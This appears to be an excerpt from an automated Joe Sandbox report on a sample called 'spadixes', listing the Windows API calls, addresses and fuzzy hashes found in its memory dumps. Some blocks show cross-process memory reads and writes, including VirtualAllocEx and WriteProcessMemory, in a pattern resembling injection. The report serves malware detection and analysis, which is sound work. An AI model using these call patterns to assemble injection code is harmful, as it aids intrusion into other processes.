                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                                        • Opcode ID: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
                                                                                                                                                        • Instruction ID: e585603f73cc5c6e0e685443afa5bb01e734362222bf3d51ee7caaa0619dbf12
                                                                                                                                                        • Opcode Fuzzy Hash: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
                                                                                                                                                        • Instruction Fuzzy Hash: CEF01938029648EFDB259F65EC0CB543B68FB017A6F188315E4A5852F0D7318956EF50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0090430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC08,?,?,00000034,00000800,?,00000034), ref: 00904335
                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008FC1D3
                                                                                                                                                          • Part of subcall function 009042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00904300
                                                                                                                                                          • Part of subcall function 0090422F: GetWindowThreadProcessId.USER32(?,?), ref: 0090425A
                                                                                                                                                          • Part of subcall function 0090422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0090426A
                                                                                                                                                          • Part of subcall function 0090422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00904280
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC240
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC28D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                        • Opcode ID: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
                                                                                                                                                        • Instruction ID: 21394263ef5336fd1add2aba69bdffc2a455a5f69bbf06a2464efca9d0c894b3
                                                                                                                                                        • Opcode Fuzzy Hash: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
                                                                                                                                                        • Instruction Fuzzy Hash: 874139B6A0021CAEDB10DBA8CD81BEEB7B8FB49300F004095FA55B7181DA71AF45DB61
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 008E22A1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 008E22A8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                                        • Opcode ID: 023606955e9e930e1b77a1058948c7d0b86c371d50f0e8e4751f69a7b90caafb
                                                                                                                                                        • Instruction ID: 9c59ec744251092a89acaa4007835200995b2cea77601bff2723f6353c8d9a7f
                                                                                                                                                        • Opcode Fuzzy Hash: 023606955e9e930e1b77a1058948c7d0b86c371d50f0e8e4751f69a7b90caafb
                                                                                                                                                        • Instruction Fuzzy Hash: D1E04F797BD3006BDB906F70EC4EF0A3A55BB82715F104468F202D71E0DBB88088EB08
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 008E22A1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 008E22A8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                                        • Opcode ID: dbc4eb55faf0e0bc3464c4199d586486b68a51491bdaa2af6dba37ccc9d4fa15
                                                                                                                                                        • Instruction ID: 73f9569e4f1561bacdc8c9f2c77b2dbd834213300a7d77a575bf99cd717359d7
                                                                                                                                                        • Opcode Fuzzy Hash: dbc4eb55faf0e0bc3464c4199d586486b68a51491bdaa2af6dba37ccc9d4fa15
                                                                                                                                                        • Instruction Fuzzy Hash: 77E05E387FD301ABDA602B71DC0EF293618BB82B16F004064F302D60E0DBE84444EB08
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,008DE014,771B0AE0,008DDEF1,0095DC38,?,?), ref: 008DE02C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008DE03E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                                        • Opcode ID: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
                                                                                                                                                        • Instruction ID: 19336c168d982843c0d083f1476da169626a6c5dd16dc4c173042950499aff13
                                                                                                                                                        • Opcode Fuzzy Hash: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
                                                                                                                                                        • Instruction Fuzzy Hash: 4DD0A739528B129FC7355F60EC08A1277D4FF05304F18841AE885D2650E7B4CC80C760
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008C42EC,?,008C42AA,?), ref: 008C4304
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4316
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-1355242751
                                                                                                                                                        • Opcode ID: 6704f55e9b3e5073255df892394aa5819afeb5d249e54ff22a30446420a86181
                                                                                                                                                        • Instruction ID: 7900d83ef0c58a02ccb2f292944b1ac12cf4aa61bc6e1629d056a82b9c7c2e6f
                                                                                                                                                        • Opcode Fuzzy Hash: 6704f55e9b3e5073255df892394aa5819afeb5d249e54ff22a30446420a86181
                                                                                                                                                        • Instruction Fuzzy Hash: 96D05E39618B129EC7244B31EC08F0176E4EB49305B00841DA946D2260E6B0C8808610
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 008F91DD
                                                                                                                                                        • SysAllocString.OLEAUT32(00000048), ref: 008F9286
                                                                                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 008F92B5
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 008F92DC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2808897238-0
                                                                                                                                                        • Opcode ID: 5d3d8aadee4d85578ee1da28ed49450d11109904c0927d36bca879430f6bf97e
                                                                                                                                                        • Instruction ID: 2c2f6dd660dcd55363d7ae3fb78270cbf23f6bd783bc5c6c01d52c8f688c9866
                                                                                                                                                        • Opcode Fuzzy Hash: 5d3d8aadee4d85578ee1da28ed49450d11109904c0927d36bca879430f6bf97e
                                                                                                                                                        • Instruction Fuzzy Hash: 9F519434A0430ADBDB24AF799891B3EB3A9FF55318F20981FE686C73D1DB7198808705
                                                                                                                                                        APIs
                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008F4038
                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 008F4066
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F4094
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F40CA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                        • Opcode ID: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
                                                                                                                                                        • Instruction ID: 0cad01581de5b71c7653974b7667faf27081755492da858cc5d09d50bb1159d9
                                                                                                                                                        • Opcode Fuzzy Hash: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
                                                                                                                                                        • Instruction Fuzzy Hash: 3531D030604A4AAFDB219F75C844BBB7BB5FF81310F15542AEB61CB1A0EB31D890DB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 0092F211
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0093E4C0,?,?,?,?,?), ref: 0092F226
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 0092F270
                                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0093E4C0,?,?,?), ref: 0092F2A6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                                        • Opcode ID: 8324007498f5febec300b3b2e9e67d9ea0586beca39e65404b237f439143b288
                                                                                                                                                        • Instruction ID: d594dce20cb3ee0dc6ccb62f1b7e0b14635fd280632c54372ab2f0f63047da45
                                                                                                                                                        • Opcode Fuzzy Hash: 8324007498f5febec300b3b2e9e67d9ea0586beca39e65404b237f439143b288
                                                                                                                                                        • Instruction Fuzzy Hash: 2C219E3D601028EFDB258F94E868EEA7BB9EB0A310F144179F915872A9D7309951EB50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008FAA79
                                                                                                                                                          • Part of subcall function 008FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008FAA83
                                                                                                                                                          • Part of subcall function 008FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008FAA92
                                                                                                                                                          • Part of subcall function 008FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008FAA99
                                                                                                                                                          • Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008FAAAF
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,008FADE4,?,?), ref: 008FB21B
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008FB227
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 008FB22E
                                                                                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 008FB247
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4217664535-0
                                                                                                                                                        • Opcode ID: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
                                                                                                                                                        • Instruction ID: 12873bf31f5048e5db1daa4202ff08107197e61e672d85cb6ed866a6dc9c8e68
                                                                                                                                                        • Opcode Fuzzy Hash: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
                                                                                                                                                        • Instruction Fuzzy Hash: E5119175A11209EFDB189FA8DC95EBEB7A9FF85314F14802DEA42D7210D731AE44DB10
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                        • Opcode ID: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
                                                                                                                                                        • Instruction ID: 96dbb54dfba0b0bd8f150b67eb42b49233b3ef9d4beb7cbef0d8208c23714384
                                                                                                                                                        • Opcode Fuzzy Hash: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
                                                                                                                                                        • Instruction Fuzzy Hash: 6111C0B6106609BFEF124FA0DC50EEABB6DFF09368F040202FA1592250C731DC60EBA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 008FB0D6
                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 008FB0DD
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 008FB0EA
                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 008FB0F1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3974789173-0
                                                                                                                                                        • Opcode ID: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
                                                                                                                                                        • Instruction ID: 1fe9fd78762b80db13a81ad9c739603461ab0f8bb874d64d1598c04610e44205
                                                                                                                                                        • Opcode Fuzzy Hash: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
                                                                                                                                                        • Instruction Fuzzy Hash: 1EE0863E7162119BD7201FB19C0CF573BA8FF96795F018828F741D6040DB348401D760
                                                                                                                                                        APIs
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008FB2DF
                                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 008FB2EB
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 008FB2F4
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 008FB2FC
                                                                                                                                                          • Part of subcall function 008FAB24: GetProcessHeap.KERNEL32(00000000,?,008FA848), ref: 008FAB2B
                                                                                                                                                          • Part of subcall function 008FAB24: HeapFree.KERNEL32(00000000), ref: 008FAB32
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                                        • Opcode ID: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
                                                                                                                                                        • Instruction ID: 4ce2e227bca223691a8edcfefb8dbd6c0b05a32fd61b936ecef6cfaf6870c1bb
                                                                                                                                                        • Opcode Fuzzy Hash: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
                                                                                                                                                        • Instruction Fuzzy Hash: 5CE0B67E11A005BBCB022FA5EC08C5DFBA6FF8A7253108221F62581575CB32A871FB91
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00915190
                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009151C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                                                        • String ID: |
                                                                                                                                                        • API String ID: 1413715105-2343686810
                                                                                                                                                        • Opcode ID: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
                                                                                                                                                        • Instruction ID: 9a7fb5b715e011c9de864e31c8aa08a2d1a80a5b987b426b645d21c7a367050d
                                                                                                                                                        • Opcode Fuzzy Hash: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
                                                                                                                                                        • Instruction Fuzzy Hash: 2F313971D00109EBCF11EFE4CC85EEE7FB9FF58710F100019E819A6166EA31A946CBA1
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 009051C6
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00905201
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2223754486-4108050209
